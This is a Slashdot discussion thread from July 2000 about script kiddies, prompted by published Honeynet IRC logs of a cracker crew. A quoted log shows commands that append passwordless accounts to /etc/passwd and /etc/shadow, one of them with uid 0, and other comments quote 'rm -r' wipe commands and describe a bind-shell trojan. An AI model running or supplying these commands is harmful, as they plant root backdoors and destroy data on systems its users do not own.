    Threats like the above are what should frighten corporations and the government. After Oracle's recent attempt to purchase MS trash, the proliferation of corporate espionage has really been brought to the forefront by the media. The damage that could result from the release of proprietary information is far greater than what results when a web server is cracked or an e-mail server taken down. Nonetheless, most organizations have no infrastructure in place to deal with this type of threat. This is where the *real* danger lies.
  • Too many people say "oh, well, a real hacker can break into any system, so it isn't fair to criticize the security on Windows 95 - people just hack it because they hate how sucessfull Microsoft is."

    Besides - the kiddies are feeding their egos off the mythology. The more people realize that the exploits are pathetic, the less incentive.

    Our secret is gamma-irradiated cow manure
    Mitsubishi ad
  • by dohnut ( 189348 ) on Thursday July 06, 2000 @07:21AM (#954074)
    Part of my company was "hacked" a while back by a script kiddie. Behind our router I pretty much just use telnet and ftp because it simple, and everyone else is behind a firewall and cannot see the traffic in between the router and firewall. Also, the machines are just test boxes with no vulnerable data in any case.

    Well, some people in techsupport set up a linux box outside of the firewall to run seti@home, and left it completely wide open. A script kiddie got to that and fired up a packet sniffer. Then of course, strange things started happening on my test boxes as the script kiddie hacked into mine seeing my plaintext passwords, quite simple.

    Why do I say this person has no skill? First, my box was running a firewall, so his IRC server was hitting the wall along with everything else he was trying to do, apparently he did not know how to disable ipchains, and I could see through netstat that he had these apps running. He replaced some apps like "ps", but left many others, like netstat. The old apps along with his packet sniffer and IRC server where moved to /bin/.bin which is pretty easy to find, using, well, "find" looking files modified within a certain time period. He also left a log of him ftping the files from the seti@home box, which is how we tracked that one down in the first place.

    Here's the beautiful part. When we found that the seti@home box was the root of all evil, we looked in the /bin/.bin/sniffer directory, or whatever it was called and viewed his sniffer log. Well, guess what it showed besides our plaintext passwords and usernames? His username and password to his ISP as he logged into his own account to get more tools while the sniffer was running. Needless to say we caught up with him.

    What these people are thinking is beyond me. Maybe I'm just paranoid, but if would ever do something like this, I'd make sure I knew my sh*t and even then odds are you will still leave some sort of trail. So, people must be right, they really must not see any consequence in committing these acts. And then they brag about it like it took skill to type ./hack 192.168.1.1. I mean as soon as you set up an IRC server to brag about your instruction following skills, you've lost all respect as a "hacker" as far as I'm concerned.

  • by Animats ( 122034 ) on Thursday July 06, 2000 @07:22AM (#954076) Homepage
    Sigh. Why, after 20 years of this crap, does UNIX still have set-UID to root? Why are minor daemons running as root, ever? Why should something like BIND, which only needs to access a few files and sockets, have significant privileges? Why is there "root" at all?

    Secure systems [ncsc.mil] don't have "root."

  • Nice points, but it's worth considering that in at least one recent case (96, if memory serves), a landowner was held liable for poor physical security that allowed vandals to break in and open the valves on a tank of toxic chemical that proceeded to escape (they didn't have a proper bund around the tank either) and pollute a stream in, if memory serves, Wales.

    Anyway, I think a distinction can be drawn between your analogy and the vulnerable box, and it's one that was used by the court in the pollution case I mentioned above.

    It's this: residential burglary is a fairly rare crime, media scare stories to the contrary, and in breaking in and using the phone the burglar didn't get access to anything he couldn't have done in a public phone booth.

    The important thing there is that your example is of a low-probability occurrence which doesn't significantly enhance the criminal's capability over what he would have had anyway.

    The vulnerable box is going to get found by script kiddies. They can automate their search for vulnerable systems and they're like rats in a grain warehouse on the net: there's thousands of the little bleeders.

    By cracking a system that's got special access privileges, or passwords and the like stored on it, they gain access to things they wouldn't otherwise have had. It's as if your hypothetical burglars broke in, found an unsecured firearm, and went out and shot someone with it.

    Because the probability is high and the potential harm obvious, surely there ought to be some obligation on the owner of a system to make sure he was ratproof?

    Perhaps Bert would be regarded as a victim, though, if he could show he was totally reliant on Al.

    Thing is, you see, that there's pretty much no decided authority on this anywhere (or at least that I've been able to find) so until there is, we're both right.

    What I'm trying to get at here is a "sniff test" - what answer "feels right" to the community as a whole?

  • by Limecron ( 206141 ) on Thursday July 06, 2000 @04:35AM (#954080)
    I disagree. Most of the script kiddies know what their doing once they reach a certain point.

    I think that the web page didn't not give enough credit to the abilities of many. Sure, some are incompetent, but many have a clue and are intentionally and knowledgably malicious.

    What this article really shows is the lack of good security and monitoring on allot of systems. (apparently not the authors, but if the number of boxes that one of the kiddie's had root was true this fact is inherently obvious)

    If all system security was effectively monitored, kiddies would be sitting around bored, DoSing random IRC users.
  • by FascDot Killed My Pr ( 24021 ) on Thursday July 06, 2000 @04:35AM (#954081)
    You are right about the sense of unreality. But I don't think you are right about the curiosity.

    My belief is that some people categorize the world into two groups: "People who are stupider than me" and "People who are smarter than me". These kiddies like to have as many entries as possible in list A and as few as possible in list B.

    What does this explain and how?

    They don't try to understand what they are doing. They can't admit to themselves that there are people smarter than themselves who could teach them about, say, TCP/IP. So they use scripts the found on the net and pretend to themselves that "I could have created this."

    It also explains the motivation: If you break into someone's system, you have proved that person is on list A. The reasoning is: "Their automated defenses didn't keep out my automated attack, therefore I am smarter than they are." This is flawed, of course, but we already know the kiddies are a little...dim.
    --
  • by mr ( 88570 ) on Thursday July 06, 2000 @04:36AM (#954082)
    >To counter that, if you ever catch a kiddie on your system (logged in), don't just boot him off. 'talk' him.

    Although this is a nice concept, the reality is as soon as the 'hacker wannabees' know you are watching, they either drop link, or type
    cd /
    rm -r * &
    THEN drop link.

    If the goal is exploration, the world is WAY different than the John Draper days of blue boxing.

    386 computers that can run BSD are thrown in the trash. So access to computing resource is limited by electrcity. No need to break into systems to get CPU cycles.

    The internet is FAR bigger than the old BellCore network. And the documentation that DRIVES the internet is all out in the open. No need to go dumpster dive the 'keepers of the network' to learn about the network. Or blue box about to map the network.

  • by Emil Brink ( 69213 ) on Thursday July 06, 2000 @04:37AM (#954083) Homepage

    Heh. Reminds me of a day at work a couple of months ago, when a colleagues' box was hacked into. The h4xx0r kid had run some kind of rootkit (although I'm not sure the box was actually rooted, but some kind of prepackaged kit was used), which cleaned out all the logs. Except, of course, for that tricky, well-hidden, hard-to-find, sneaky, known-by-gurus-only one known as .bash_history! ;^)

    It was quite cool to see which commands had been run, etc. I think he actually started up an IRC server on the box, probably to serve warez... That, and the ObPortscan of course. ;^) Our local nettech archived the contents of the kid's account down on a couple of floppies and did a reinstall. Some day, when I'm sufficiently bored, I think I'll ask him for those disks. Might learn something useful. ;^)
  • from day12:


    :D1ck :oye give me those commands for linux password adding and sun adding re ro re r i gave u
    :D1ck ::P
    :D1ck :i lost mine

    :J4n3 :wait
    :D1ck :and i dont wana make again
    :J4n3 :cp /etc/passwd /etc/.tp;
    :J4n3 :echo "ro::99999::::::" >> /etc/shadow;
    :J4n3 :echo "r::99999::::::" >> /etc/shadow;
    :J4n3 :echo "ro:x:500:1000::/:/bin/bash" >> /etc/passwd;
    :J4n3 :echo "r:x:0:0::/:/bin/bash" >> /etc/passwd;
    :J4n3 :cp /etc/shadow /etc/.ts;
    :D1ck :k
    :J4n3 ::p


    I'm just t00 lazy to look in the r00tkit User Guide
  • by Moderation abuser ( 184013 ) on Thursday July 06, 2000 @05:02AM (#954090)
    Nah, they've no idea what they're doing. You could replace them with an expect script and be more effective. Automate the whole process.

    Basically the moral is, take care of basic security. Get rid of stuff you don't need on the box. Use tcpd. stop and comment out all unneeded services from inetd.conf.

    Just take basic security measures.

  • While reading the IRC logs I was struck by a nearly overpowering urge to write a perl script ala Dialectizer. To convert plain text to k1dd3.
    I think that I would have to if I were to become an 31337 h4x0r. because I sure as hell cant type like that :)
  • by plague3106 ( 71849 ) on Thursday July 06, 2000 @07:25AM (#954096)
    Although i'd have to argue w/some of your point. If you got shot b/c you didn't put up some protection WHEN YOU KNEW YOU WERE IN VERY DANGEROUS TERRITORY, then i'd have to place at least some of the blame on you. If your neighborhood has a high crime rate, i think you'd lock you door, right? Well the internet is a VERY hostile enviroment to be in, so yes you do take some of the blame if you have lax countermeasures.
  • How wrong can you get.

    The problem is that admins don't bother to keep track of problems and fix them. It does not matter how easy or hard it is.
    For example, I had this idiot come in and tell me he likes *BSD (Any of them) because he can set them up and "forget about them". When I asked him how he fixed problems, he stated that he did not since they were so secure. I just about died.

  • The OpenBSD security is a marketing myth. The security of a system has everything to do with the compentency and vigilance of the admin, and very little to do with the operating system (The exception here are Windows 9* boxen, which cannot be secured by design).

    Have you actually used OpenBSD? The install has sendmail and portmap running by default. You have to manually remove this services.

    All the bragging about OpenBSD being SO secure does is give the admin a false sence of security. EVERY machine can be compromised. EVERY ONE. The job of a good admin is to constantly raise the bar; to make it more and more difficult for a cracker to get in.

    Besides: if a cracker can social engineer someone into giving him their password, then the system security doesn't mean shit. Humans are ALWAYS the weakest link in any security policy.
  • You have a responsibility to protect yourself, and when you set up a system that other people rely on, you have a responsibility to protect the system for them.

    My favorite comparison to the ILOVEYOU problem is: if you built a subway system that broke down whenever some kid painted graffiti on any of the walls, who would be responsible? The ignorant kid who commits an act of vandalism which takes little effort and can be done in secret? Or the responsible adults who knowingly built a system that can't tolerate graffiti?

    Any system which can be destroyed by the petty vandalism of a child was effectively destroyed by its designers.

    In a world with billions of people, you have to assume that a certain percentage will do damage just for the fun of it, if it's easy enough. If you're responsible for security and you don't make it too hard for them to do it, you're as much to blame as the person who does it.
  • What do you mean by "low learning curve"? That's pretty euphamistic. There's nothing really to learn. You just read a page like the one posted and the info is almost all there. Just a little bit of patience to download and set the stuff up and you're there. Hell, you could even do it from Windows (*gasp*).

    kwsNI
  • Your average consumer is never going to keep up with the security stuff they need to. It's the operating system manufacturer who is going to HAVE to start thinking about security. While Microsoft has a bad track record, I should point out that pretty much all the Linux distributors are just as bad. I don't even trust Mandrake, whose "Paranoid" security level seems pretty damn tight. Linux distributors have this tendency to just hand setuid bits out to any bozo who claims his program needs one, and the first thing many people do when they get Linux is give all their friends accounts on their system. They may as well be handing out the root password.

    Security is going to be much more important as more and more people get on the net, and it's time to start addressing it.

  • That depends on the size of your network. I see a lot of posts like this, but in a really large environment, it takes substantially more than that. For example: I work for a nameless phone company, but it's large (the largest in the US, hint hint). We now have on the order of 180 firewalls, and that's just one piece of the security puzzle. That costs substantially more than $50k. If I could secure our network with $50k, "half a brain, some security know-how, and OpenBSD", I'd be the hero of this company.

    Too many people think that all networks are the small, easily managed size that characterizes small to medium size businesses. But networks that serve 260,000 employees and countless vendors/contractors are a beast of a different magnitude.

  • by davebooth ( 101350 ) on Thursday July 06, 2000 @04:45AM (#954119)

    You dont try and understand the ants in your kitchen, you find out where they are coming from and block it up. Same for a script kiddie. Keeping them out is just a matter of awareness on the part of the sysadmins and not doing silly things like running services you dont need or failing to keep the ones you do need patched. Much like blocking up the cracks the ants are coming through.

    On the other hand, if a real expert cracker wants to smoke my systems then I may as well kiss my digital ass goodbye because I know my limitations and I know theres many folks out there who can find holes in systems that I never even knew were technically possible. The difference is that the real experts are usually more mature than the script kiddies and need some kind of reason to hit a system - and as far as I know they have no such reason to hit mine, theres nothing there that they need.

    Just IMHO but as far as I'm concerned the only time I'd bother even trying to catch a script kiddie is if they are doing DoS attacks.. that upgrades 'em from an ant to a roach and I'll go out of my way to squish 'em. Otherwise I just close 'em out and ignore 'em.
    # human firmware exploit
    # Word will insert into your optic buffer
    # without bounds checking

  • by thesparkle ( 174382 ) on Thursday July 06, 2000 @05:30AM (#954121) Homepage
    The amount of time spent by these kids online is amazing. Either rooting, downloading, playing games or chatting it up, they spend hours online doing nothing else. Where are their parents?

    I think this is part of the misconception brought about by some of our more esteemed members of society; that a child constantly in front of a computer is preparing for the New Internet Age of IT Jobs or some other mantra. More rubbish than not if young people are only playing games, engaging in IRC or downloading exploits.

    Having see firthand what happens when they get caught, I don't think these people realize the implications of their efforts. There is some belief out there that "hax0rs", after they do some high-profile breakins and DOS attacks, are hired to well-paying security jobs. *In most cases* it is quite the opposite.

    Criminal records follow you throughout your life.

  • by mirko ( 198274 ) on Thursday July 06, 2000 @03:50AM (#954123) Journal
    Seen that ?
    ftp> get sun2.tar
    200 PORT command successful.
    150 Opening ASCII mode data connection for 'sun2.tar' (1720320 bytes).
    No comments... ;-)
    --
  • by 11223 ( 201561 ) on Thursday July 06, 2000 @03:54AM (#954124)
    Here's why the kiddies do what they do:

    Ever sat down at a box somebody's given you an account on and just poked around to see how it's organized? That's part of the script kiddie feeling - it's partly about exploring the system, seeing what you can do.

    But there's something more behind that - it's a feeling of inconsequenciality (sp?!?) - that those boxen they're poking with are inconsequential to them and immaterial - they don't actually exist in their mind!

    That's the problem that faces the sysadmin - the kiddies feel that you do not exist, and therefore it's okay to go off and exploit these systems! To counter that, if you ever catch a kiddie on your system (logged in), don't just boot him off. 'talk' him. Make sure he knows that there are people behind these machines, and that they're not just machines to be played with.

  • by Minupla ( 62455 ) <`minupla' `at' `gmail.com'> on Thursday July 06, 2000 @03:56AM (#954128) Homepage Journal
    With script kiddies, it becomes a foot race between the whitehats and the script kiddies. How quickly can you get to your box when your pager goes off with a bugtraq-alert message? Can you get back to your box before the script kiddies can?

    Make no mistake, script kiddies may be novices, but they can do a heck of a lot of damage to an organization if they beat you on the foot race.

    ----
    Remove the rocks from my head to send email
  • Inept crackers strung by intended 'victim' [theregister.co.uk].
    The
    transcripts [securityfocus.com] of these sessions are a priceless document of the way semi-skilled crackers feel their way clumsily towards their goals. Honeynet re-named the two main crackers "D1ck" and "J4n3", and their crew "K1dd13", to express their contempt for the group's skills.
    Some excerpts from the logs:
    Note: We have removed intervening comments in the dialogues for clarity.


    :D1ck: i am making a elite archieve of sploits just for k1dd13 members
    :D1ck: can u make pass protection on sites?
    :J4n3: yeah i can make it password protected
    :D1ck: make sure it's leet i dont want any other person other then u me m4ry
    mi||er and glitchX to have access :D1ck: hehe
    :D1ck: all leet stuff
    :J4n3: y0 hooo
    :J4n3: ha ha
    :J4n3: d0n worry boss
    :D1ck: hehehe


    Later, crew-member "b0b" expresses considerable interest in learning to code in C. This, he reckons, will make the crew even leeter than it already is.
    :b0b :what's vor-ticks-3?
    :D1ck :A TROJAN
    :D1ck :on receiving a string
    :D1ck :on port 80
    :D1ck :it opens a bind shell
    :D1ck :like on a string 'asad'
    :D1ck :it opens port 234323,
    :D1ck :or some thing
    :D1ck :hehehe
    :D1ck :LOL
    :b0b :btw, i'm going to be learning C soon too inshallah
    :b0b :the[n] we'll have C fights
    :b0b :yipeeee
    :b0b :i'll insult you in code
    :b0b :and once we develop m4d C skillz.. we'll develop D
  • But.. Hmm... in a sense, they *are* hackers. I mean, sure... you say.. they just used 'scripts' to do it. You are a programmer.. but you need a 'compiler' to write code. They may not understand the details of creating a buffer overflow exploit script... but the fact is.. they *can* and *do* break into systems. So.. if a hacker (don't go off on me about proper definitions)is someone who can acquire unauthorized access to a computer.. then they *ARE*
  • by idistrust ( 66924 ) on Thursday July 06, 2000 @03:58AM (#954135) Homepage
    \/\/3 7yp3 a11 l337. 7h47'5 7h3 7R1ck.

    Enjoy your new knowledge everyone.

  • by Sėgnal ll ( 203092 ) on Thursday July 06, 2000 @04:00AM (#954137)
    :D1ck! :do this 'df'
    :D1ck! :and paste me
    :D1ck! :and then df -k
    :J4n3! :wait
    :J4n3! :.Filesystem 1k-blocks Used Available Use% Mounted on
    :J4n3! :./dev/hda8 1935132 878956 957780 48% /
    :J4n3! :./dev/hda7 23302 2650 19449 12% /boot
    :J4n3! :./dev/hda1 2064032 1230496 833536 60% /mnt
    :D1ck! :oki
    :D1ck! :mkdir /win; mount -t vfat /dev/hda2 /win
    :D1ck! :wait, what is /dev/hda7
    :D1ck! :?
    :J4n3! :linux swap partition
    :D1ck! :ok

    hmm... without my r00tkit, i'm just a luser
  • Software should be kiddie-proof, and we should sue Microsoft for all of the gigantic security holes that they leave in they're software, but people don't and software isn't. Why is that? I mean, people still sue Dunkin' Donuts because their coffee was too hot and they spilled it on themselves! They get multi-million-dollar out of court settlements. If someone were to sue Microsoft for the damage caused by the ILOVEYOU virus, I wonder if M$ would settle? Because if they didn't, you could sue anyone (Sun, Apple, Oracle) for all of the backdoors they "forgot" to lock up, right?

    And then, as they would say in their defense, the whole economy crashes... but maybe not.

  • by TheDullBlade ( 28998 ) on Thursday July 06, 2000 @07:58AM (#954142)
    The supply of script kiddies is, for all intents and purposes, infinite.

    The question is, what can we do with them?

    To answer this kind of question, I usually start by asking, what are they made of?

    Script kiddies are made of meat.

    So the next time your system is compromised by a script kiddie, track him back to his lair, and get a fresh freezer-fill of long pork.

    If you lack the butchering skills, please contact my organization: 31337 |\/|337 Enterprises, and let us take care of the messy details.

    (sung to a 50's jingle tune)
    "If you've got a H/\X0R1NG problem that's got you beat,
    we'll do the hacking at 31337 |\/|337."
  • by Veteran ( 203989 ) on Thursday July 06, 2000 @04:46AM (#954144)

    Young men spend a lot of time chasing illusions of power, young women typically chase the illusion of control. Script kiddies do destructive things because it gives them an illusion that they are powerful. It is the same illusion that a vandal gets by throwing paint onto an existing masterpiece: 'See, I'm a painter also'. It is almost always easier to destroy than to create; it is a very difficult job to write a program which works well and is useful. It is easy to crash such a program; just pull the power cord. People who crack into systems, and virus writers, both get the same illusion of power; "see how mighty I am, look at this chaos I caused".

    The truth is that real power feels like nothing. You do something, things happen, and you get no feel that you did anything; all of the force of your effort goes into the target. The less you feel, the more the target responds. This is disappointing to men who want 'the feeling of power'.

    Eventually most script kiddies outgrow the sort of adolescent thinking that causes them to do destructive things. Young people everywhere have a 'golden glow' about their existence. It is obvious to them that the old people like me don't get it. However, that is not what is going on; we get it, we just know that 'special glow' is an illusion. Real maturity arrives when you can see the illusions of youth for what they are.

    Does this mean that I want 13 year olds to behave like 50 year olds? NO, making mistakes is the only way to learn anything; if you don't make any mistakes you haven't learned anything - you already knew how to do what ever it was that you were doing. Youthful indiscretions are an essential part of growing up - if you are lucky, they don't get you killed or sent to prison for a long time - eventually you do something that scares you enough to cause you to learn something.

    Young people expect the same reasonableness from government authority figures that they have experienced from the authority figures in their life while they grow up; but that is a false expectation. Government, and the criminal justice system are giant, impersonal machines. When you get caught up in the gears of that machinery you will be ground into hamburger meat by it. All of your dreams, fears, and hopes are meaningless to the impersonal machinery of government; it grinds the good as finely as it does the evil.

    Of course there is a secondary reason for trouble making; some people are searching for attention, and to them even punishment if better than being ignored.

  • Right on the mark! I felt the same way when I first discovered that I could telnet to port 25,
    and talk to a mail server. (many years ago) It was
    the thrill of doing something (seemingly) illicit.

    Of course, the real trick if you're after that sort of thrill from breaking into machines, is to get good, get a job, and do it for a living.

  • by w00ly_mammoth ( 205173 ) on Thursday July 06, 2000 @04:51AM (#954146)
    I actually find it more puzzling understanding the other side, i.e, those who are responsible for preventing security breaches. These script kiddies are just teenagers trying to be cool, but what about the admins/managers/etc., who sometimes spend millions on security and fail to even plug well known holes?

    For instance, take the case of the Australian govt., which put up info on thousands of business with their business number clearly visible on a CGI thingie on the URL. Guess what, changing the number gave you immediate access to the bank accounts and tax info of the relevant company. Couldn't they have even bothered to scramble the thing in the URL?

    It reminds me of the story in Cliff Stoll's excellent book "The Cuckoo's egg" (a must read for hackers), in which he details how military depts. spent millions on security and left guest access open on the very machines they were supposed to protect. Or Richard Feynman's account of how mega-expensive safes guarding nuclear secrets were left with the default combination lock setting.

    There was a flap some yrs ago when Dan Farmer scanned various banks for security and published the results, and it turned out many had not bothered applying even rudimentary, known fixes for problems known for years.

    It's really amazing how utterly clueless and irresponsible the people in charge of security are. Generally, they tend to be suits impressed by buzzwords or mega $$$ security firms. Nobody really understands the real issues or even the basics. You can never prevent script kiddies from existing in this world. What you can do is take steps to prevent cracking.

    Take another example of general hysteria and cluelessness - after the flap over the I LOVE YOU virus, almost none of the mass media coverage was about the fact that it was spreading via VBscript on outlook. MS must have been counting its lucky stars that nobody thought of pointing out this remarkable common factor.

    And so history repeats itself...nobody fixes the root of the problem. Maybe somebody should write up an analysis of the mentality of people behind a typical insecure installation. But then, that would be too boring.

    PHB1: Should we consider DoS attacks?
    PHB2: What, DOS? Didn't we upgrade to Windows?
    PHB1: Not sure...my team wrote something about DoS. OK, you're right, we probably don't need to worry about DOS. I think we have everything covered now.
    PHB2: Good, now let's write up the status report.

    w/m
  • haha, that's hilarious, because I also got the same feeling from telnetting to port 25! Basically anything somewhat techy like that can do it for people. And yup, these kids getting jobs would stop them, and lets face it, a lot of them DO end up getting jobs at ISPs doing tech support and whatever. They're not malicious primarily, the maliciousness is sort of a secondary thing, due to boredom I think
  • The "root problem" is someone commiting a crime.

    If I shoot you, it is not your fault that you didn't place yourself behind a wall that would stop the bullet.

    These people are bullies, and exhibit the bully mentality in the only realm that they are able. Remember, a bully doesn't want to fight you, he just wants to beat you up.

    Speaking of which, I'd love to show up at the door of one of these guys, just for the look on their face...anyone have any stories like that?

  • by AndrewD ( 202050 ) on Thursday July 06, 2000 @05:40AM (#954151) Homepage

    OK, here's something to discuss, but first some background:

    In the real world (ie. the UK - I understand the US follows this one mostly), if you have something dangerous on your land and it escapes to a neighbouring piece of land, you have to pay for the damage. The case that set this rule was Rylands v. Fletcher, in which the owner of a badly-maintained reservoir got taken to court by the neighbour he flooded out.

    Also in the real world, if you sell a product that doesn't do something the customer can reasonably expect it to do, you're liable for some or all (depending on circumstances) of the harm that results.

    Bearing in mind those radically simplified statements of the law, consider the following:

    1. Al installs unspecified OS on Bert's box, which is connected to the net.
    2. Bert's box now has all the security features of a public lavatory
    3. When Script Kiddies Attack (coming soon on a low-rent cable channel near you!), Bert's box gets thoroughly reamed out in all manner of entertaining and costly-to-Bert's-business ways.
    4. Having got into Bert's box, one of the Script Kiddies manages to use that route - either learning a password, or pretending to be Bert - to get into Charlie's (one of Bert's customers, or something) box, and plays merry hell with it in all manner of entertaining and costly-to-Bert's-business ways.

    Got all that? Now, applying your skill and knowledge of what a responsible and prudent owner of a box-connected-to-the-net and a responsible and prudent installer of OSs and software on such boxes ought to know and do, give your opinion as to the following propositions:

    1. By maintaining a seriously leaky box, Bert ought to be liable to Charlie on the same principles as the owner of the reservoir in Rylands v. Fletcher was, save that we're applying that principle to the net rather than the real world; and
    2. Al is liable for the whole sorry mess as he ought to have made the system more secure to start with.

    No, I don't have a case on these facts running at the moment. Yes, I think proposition 1. is more interesting - 2. is pretty much a no-brainer as far as I'm concerned - as it might be a stick with which to beat management into paying for better security.

    Ignore license disclaimers for present purposes.

    Other interesting background: failure to keep personal data adequately secured against unauthorised access is potentially a criminal offence here in the UK, and it can certainly get you on the wrong end of nastiness from the Data Protection Registrar.

  • Except that, as long as both boxes are solairs... ascii mode shouldn't munge the file..
  • by / ( 33804 ) on Thursday July 06, 2000 @05:45AM (#954154)
    And I don't think I'm alone in thinking that script kiddies, while annoying, are a natural resource, who play an important ecological role in thinning the herd and weeding out the week among sysadmins (who are too lazy/stupid to maintain the latest bugfixes) and their servers. Let's make sure that as law-enforcement efforts are stepped up, the EPA, the Forestry Services, and the Fish and Wildlife Services establish some refuges to preserve the species as others try to drive it to extinction.
  • I used to do criminal defense/computer law for hackers a while back. One time, I was in a room with 8 FBI agents, going over a particular matter and trying to keep a client out of jail. During a break, a couple of the agents came up and asked me, off the record, what motivates these guys and what they could do about it. I told them, flat out - "Get them laid!" The agents, who are not known for their sense of humor, stared at me for a couple of seconds, and then burst out laughing.
  • by Anonymous Coward on Thursday July 06, 2000 @05:53AM (#954157)
    To counter that, if you ever catch a kiddie on your system (logged in), don't just boot him off. 'talk' him. Make sure he knows that there are people behind these machines, and that they're not just machines to be played with.

    Recently one of my boxes was exploited. I screwed up and didn't block telnet on the firewall, and some kiddie found the system, and decided to use it in a DoS attack. Funny thing: the box is sitting on a slow DSL line, so it isn't exactly the king at sending out high speed denial of service attacks... :-/

    When I found the attack (because my DSL modem was lit up like a christmas tree), I logged into the system, and told the kiddie to get the fuck off my system. And to find a system on a bigger pipe than a home DSL for his DoS attacks. While he attempted to wipe out my hard disk by doing a 'rm -r /' which I stopped by powering down the system (oh, did I mention this was a slow Pentium running Linux, so in the 5 seconds I noticed the 'rm -r /' process, it had only deleted part of my /bin directory?), he also got out of dodge, leaving his kiddie script crap laying around in a (not so well hidden) directory.

    Funny thing: I think I scared the crap out of him when I told him to get the fuck off my system. All I know is that I watched him try to do a 'talk' back to me for several seconds before he blew out of there with his piss poor attempt to erase root.

    Aside from the usual IP address sweeps, I haven't been visited by a script kiddie since. Probably because they realize that a DoS doesn't work from a slow Pentium-based Linux box on a DSL...
  • by Bedemus ( 63252 ) on Thursday July 06, 2000 @04:00AM (#954158) Homepage
    I read this article yesterday... just recently got hooked on RootPrompt.org... Though their name is an obvious homage to rootshell.org, their content is quite original... Easily more enjoyable than the actual IRC logs shown are the descriptions of each day's activities:

    Day 5, June 08
    D1ck asks J4n3 to take out three systems for him. D1ck and his elite buddy Sp07 try to figure out how a sniffer works "umm doesnt it have to be the same network?".


    Been doing sysadmin/security work for a while now, and I've gotta say, they pretty much hit the nail on the head with regards to how little knowledge the majority of the crackers out there really have. Not to say that all crackers are script kiddies -- far from it -- but a lot of them are, and I'd wager the majority of them are. People who take an interest in security and want to actually learn stuff generally find out they can learn much more by trying to fight the good fight and lock down a system than they can by downloading and running scripts... Even the more malicious types who have a clue tend to spend more time writing custom exploits and publishing them than actually cracking boxes themselves. These are the guys that security firms try to pick up -- they know how the cracker mindset works, but they are more mature than the typical script kiddie, and they REALLY know their stuff.

    --
    NeoMail - Webmail that doesn't suck... as much.
  • Predators STRENGTHEN prey, as just about ANY scientist who knows anything about evolution can tell you.

    hah! Predators eat prey. Tell me the ones that are killed are strengthened because of it.

    If I leave my keys in my car, I am guilty of carelessness (not a crime). If you steal my car, you are guilty of theft.

    To make some better analogies to computers: If you try every key combination possible to steal my car you are the one at fault. If you try your key on every car in every lot, you are the one at fault. If you find out that you can simply break the window of a car, cross a couple wires, and drive off with my car, you are again at fault.

    Hmm...seems cars aren't built to defend these sorts of attacks. Why do we hold computers to such a different standard?

    Just because they can be attacked with anonymity, doesn't mean its the fault of the victim for being in a place to be a victim.

    You are asking to defend the rapist that claims "She was asking for it."

  • by bergeron76 ( 176351 ) on Thursday July 06, 2000 @04:01AM (#954160)
    Okay, this isn't intended to be flamebait. When I was immature and had the "M4D SKILLZ" and virtually unlimited free time on my hands in High School it was fun to try and get into machines. It started by hacking games like Dungeons of Kairn; but it developed into trying to access other machines (ie Emulex/2 BBS software). This isn't a justification for this behavior, but I hope it does provide some reasonable insight into the logic behind it. There's something inherent (this can be argued) about being a teenager and being seen as "bad". The "James Dean" effect if you will. Now, the formula reads as follows:

    Immaturity+M4DSKillZ(basic softwareknowledge)+a desire to prove yourself to your peers(linked to immaturity)==Silly Script Kiddie (scripts are for kids!)

    Most likely they will outgrow this and move into security careers or get caught via tougher legislation and learn from thier mistakes.
  • Too bad that the fact that they appear on Slashdot has probably boosted their egos to make them believe they are 'cool'. y3s, 31337 paqquete monkeys, we ph33r you. Script kiddies are fools. A packet monkey is the same as a regular monkey, they just throw something besides their own feces.
    ---

    ---
  • by Signal 11 ( 7608 ) on Thursday July 06, 2000 @04:04AM (#954168)
    It's not the level of skill, or lack thereof, of the script kiddies, it is the lack of time on the part of system administrators. Security is a low priority for most organizations. Why spend $50,000 to secure your computing facilities when you can spend that on a choice advertisement spot on tomorrow's evening news?

    Justify security expenditures to management and you'll solve the internet's "security problem" lock, stock and barrel.

  • What's to understand ? All you need to know is that they are "kiddies" beyond that they know something about computers and are interested in networking etc.

    Fact is a script kiddy is a graffiti kiddy with a laptop or a joy riding kiddy with a few root kits.

    If you are really worried about script kiddies you should find productive uses for those idle hands as early as possible. The other approach being taken by authority now is just begging for disaster. You can't make them "unlearn" these techniques. Banging a few of them around and preventing them from earning a living ( Kevin ) will just give the rest a reason to seek revenge.

    At the very least we have yet another generation of disaffected young men with dangerous skills and it's a whole lot simpler to get rid of the disaffection than to get rid of the dangerous ( if somewhat limited ) skills.
  • by luckykaa ( 134517 ) on Thursday July 06, 2000 @04:05AM (#954173)
    I remember hacking into the US AI mainframe accidentally when trying to get some games. Pretty cool system though. After the first connect, the thing called me back.

    Went pear shaped when I nearly cause World War three of course. Still, all worked out okay in the end.
  • by DrEldarion ( 114072 ) on Thursday July 06, 2000 @07:59AM (#954175)
    D1ck :i`m a elite hacker

    Bah! That shows his lack of knowledge right there! Everyone knows that REAL hackers write '31337 h4x0r'! Stupid wanna-be's. ;)

    -- Dr. Eldarion --
  • I probably know nothing about security, but from what I have seen I'm not sure if complicating the capabilities really helps. It may actually give a false sense of security and make things worse.

    The thing that convinced me of this was the recent Linux bug (actually not a bug but a design error, I think) where a program would lose the ability to give up abilities! It could then continue on thinking it was unable to cause damage, and be even more dangerous than a program that was written assumming it is setuid root.

    However Unix has far too many programs that are setuid root for no reason. The small job needed (like checking a password) should be put in little programs that are easily confirmed as not having a hole.

    Reducing the set of possible privledges to "all" and "nothing" should force people to figure out ways to get things done with "nothing", rather than rely on complex capabilities.

    I would also modify Unix so that a setuid program just has the ability to setuid(0), but it starts out with normal privledges. This will encourage bracketing the necessary parts with set/reset uid calls, rather than doing everything like that.

  • Hey - I remember that. Damn good thing that machine knew how to play tic-tac-toe, or we all would have needed some serious friggin' sunscreen.
  • Of course I have to run my own DNS server, and a DNS vunerability is exactly what killed my site for that length of time.

    I've subsequently upgraded my DNS (why on earth did they change the configuration file format so much, anyway?), but the scars from the experience still sting.

    D

    ----
  • by sbeitzel ( 33479 ) on Thursday July 06, 2000 @06:02AM (#954186) Homepage Journal

    I was riding a late N-Judah train home some months ago, and a kid got on at the Embarcadero station. He looked kind of nervous and was carrying a rucksack with an SFO luggage tag on it. I asked him if he needed directions, and he turned out to be going almost as far out as I. So I told him where his stop was. He sat next to me and we talked a little.

    After a few minutes of conversation (Where ya from, whatcha do...) he laughed and said, "I'm a hacker." I replied, "Yeah? What have you done?" He told me about some DoS stuff. I told him I wasn't all that impressed, that basically any system can be cracked, given time and ingenuity. I told him that what really impressed me was creative, constructive work. He then told me that he and a couple of buddies had gone into security consulting, setting up defenses against "hackers" like him. I told him that was a lot more impressive, that by contributing something real, by making people's lives better, he'd get real respect.

